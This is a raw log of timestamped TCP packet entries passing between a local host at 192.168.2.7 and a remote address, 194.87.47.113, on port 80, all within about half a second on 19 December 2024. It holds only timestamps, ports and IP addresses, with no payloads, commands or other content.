Dec 19, 2024 08:47:26.533269882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.533870935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.533878088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.533878088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.533884048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.534655094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.534940958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.535012960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.535332918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.535557032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.535893917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.536350012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.536686897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.537058115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.537614107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.537643909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.537645102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.537673950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.544785976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.544969082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.545198917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.545367956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.545768023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.546103954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.546116114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.546190023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.546190023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.546921015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.546932936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.547235966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.547580004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.547800064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.548439026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.548564911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.548676014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.548743963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.549269915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.549609900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.550031900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.550044060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.550726891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.550726891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.550795078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.551017046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.551518917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.551604033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.551796913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.552407026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.552443981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.552778006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.552778006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.553179979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.553342104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.553946972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.554127932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.554164886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.554769039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.554816008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.555537939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.555551052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.555875063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.555882931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.556312084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.556406021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.556561947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.557102919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.557260036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.557436943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.557436943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.557867050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.558702946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.558715105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.559031963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.559294939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.559395075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.559536934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.559937954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.560247898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.560260057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.560825109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.561069012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.561074018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.561086893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.561146975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.561827898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.562093019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.562513113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.562618971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.562838078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.563349962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.563379049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.563790083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.564291000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.564400911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.564424992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.564465046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.565062046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.565264940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.565387011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.565778017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.565958977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.566626072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.566862106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.566880941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.567291975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.567456961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.567692995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.567753077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.568146944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.568366051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.568439007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.569015026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.569165945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.569789886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.569837093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.569967985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.570569038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.570713043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.570724964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.570769072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.571321011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.571511030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.572108030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.572210073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.572309017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.572909117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.573040962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.573510885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.573510885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.573978901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.574080944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.574482918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.574790955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.575122118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.575323105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.575339079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.575481892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.575541019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.713655949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.713855982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.713992119 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.714021921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.714380980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.714566946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.714608908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.715039015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.715337038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.715363979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.717185020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.717251062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.722244978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.722425938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.722681046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.722695112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.723021030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.723193884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.723400116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.723742962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.724124908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.724195004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.724447966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.724910975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.725047112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.725106955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.725327969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.725650072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.725907087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.726016998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.726502895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.726670027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.726758957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.727236032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.727427959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.727817059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.728025913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.728208065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.728344917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.728899956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.729052067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.731758118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.737073898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.737325907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.737517118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.737576008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.738329887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.738348007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.738396883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.739155054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.739172935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.739336014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.739582062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.740070105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.740087986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.740238905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.740238905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.740684986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.740751982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.741377115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.741437912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.741664886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.742218971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.742436886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.742472887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.743017912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.743339062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.743391037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.743938923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.743995905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.744169950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.744635105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.744700909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.744978905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.745647907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.745687962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.745973110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.746066093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.746526003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.746737003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.746809959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.747258902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.747381926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.747900009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.748399973 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.748442888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.748580933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.748641014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.748667955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.749277115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.749347925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.749702930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.750305891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.750322104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.750432968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.750432968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.751080990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.751110077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.751147985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.751841068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.751871109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.752213001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.752491951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.752707958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.753324986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.753362894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.753889084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.754127026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.754204988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.754295111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.754945993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.755072117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.755095005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.755644083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.755752087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.755808115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.756464958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.756623983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.756791115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.757389069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.757419109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.757443905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.758018970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.758245945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.758738041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.758760929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.758832932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.758949995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.759016991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.759530067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.759774923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.759857893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.760340929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.760652065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.761194944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.761271000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.761435032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.761979103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.762025118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.762166977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.762881994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.762978077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.763216972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.763470888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.763645887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.764015913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.764398098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.764440060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.764622927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.764669895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.765126944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.765429020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.765727997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.765964031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.766134024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.766861916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.766923904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.766990900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.767474890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.768016100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.768079042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.768146038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.905919075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.905931950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.906076908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.906325102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.906925917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.906985044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.907031059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.907450914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.907795906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.907955885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.923438072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.923501968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.923603058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.924123049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.924144983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.924421072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.924956083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.924976110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.925203085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.925273895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.925422907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.925625086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.926079988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.926179886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.926331043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.926884890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.927339077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.927361012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.927644968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.927704096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.927839994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.928399086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.928467989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.928617001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.929411888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.929490089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.929568052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.930026054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.930401087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.930622101 CET	49707	80	192.168.2.7	194.87.47.113
